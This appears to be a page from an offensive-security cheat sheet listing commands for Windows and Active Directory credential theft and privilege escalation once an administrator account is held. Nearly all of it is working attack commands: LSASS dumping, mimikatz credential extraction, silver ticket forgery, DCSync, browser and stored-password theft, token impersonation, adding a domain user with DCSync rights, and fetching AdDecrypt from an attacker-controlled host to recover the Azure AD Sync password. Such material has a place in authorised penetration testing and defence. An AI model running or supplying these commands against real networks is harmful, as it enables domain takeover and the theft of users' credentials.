Administrator account

Extract credentials from LSASS

procdump.exe --acepteula -ma lsass.exe lsass.dmp

Extract Credentials from SAM

secretsdump.py <domain>/<user>:<password>@<ip>

Extract Credentials from LSA

cme smb <ip-range> -u <user> -p <password> --lsa

Extract dpapi

DonPAPI.py <domain>/<user>:<password>@<target>

Extract kerberos tickets

sekurlsa::tickets

Silver Tickets

Prerequisites

SPN password hash
Domain SID
Target SPN

Silver Ticket Forgery

NTLM Hash

We have to load mimikatz and extract the NTLM hash:

iwr -UseDefaultCredentials http://<RHOST>
.\mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
NTLM: 4d28cf5252d39971419580a51484ca09

Domain SID

Then to obtain the SID use whoami:

whoami /user                           
SID: S-1-5-21-1987370270-658905905-1781884369-1105 (S-1-5-21-1987370270-658905905-1781884369)

Ticket Forging

With that information we can forge the ticket:

mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:<DOMAIN> /ptt /target:<RHOST> /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:<attacker_user>

Using the ticket

klist
iwr -UseDefaultCredentials http://<RHOST>

DCSync

.\mimikatz.exe
mimikatz # lsadump::dcsync /user:<DOMAIN>\<USERNAME>
mimikatz # lsadump::dcsync /user:<DOMAIN>\Administrator

Search Password Files

findstr /si 'password' *.txt *.xml .docx

Search Stored Password

lazagne.exe all

Chrome

%appdata%\Local\Google\Chrome\User Data\Default

SharpChromium.exe

Token Manipulation

.\incognito.exe list_tokens -u

.\incognito.exe execute -c "<domain>\<user>" powershell.exe

Account Operators Group Membership

Add User

net user <USERNAME> <PASSWORD> /add /domain
net group "Exchange Windows Permissions" /add <USERNAME>

Import PowerView

powershell -ep bypass
. .\PowerView.ps1

Add DCSync Rights

$pass = convertto-securestring '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=<DOMAIN>,DC=<DOMAIN>" -PrincipalIdentity <USERNAME> -Rights DCSync

DCSync

impacket-secretsdump '<USERNAME>:<PASSWORD>@<RHOST>'

Azure Admin Group Membership

If an user is Admin of Azure Group we can try to exploit Azure AD Sync to grab the administrator password:

Release Initial release · VbScrub/AdSyncDecryptGitHub

iwr <IP>/AdDecryp.exe -o AdDecrypt.exe
iwr <IP>/mcrypt.dll -o mcrypt.dll

Then run this command being inside the path C:\Program Files\Microsoft Azure AD Sync\Bin :

C:\Temp\AdDecrypt.exe -FullSQL

PreviousActive Directory Certificate Services (AD CS)NextDomain Admin

Last updated 5 months ago

hashtagExtract credentials from LSASS

hashtagExtract Credentials from SAM

hashtagExtract Credentials from LSA

hashtagExtract dpapi

hashtagExtract kerberos tickets

hashtagSilver Tickets

hashtagSilver Ticket Forgery

hashtagDCSync

hashtagSearch Password Files

hashtagSearch Stored Password

hashtagChrome

hashtagToken Manipulation

hashtagAccount Operators Group Membership

hashtagAzure Admin Group Membership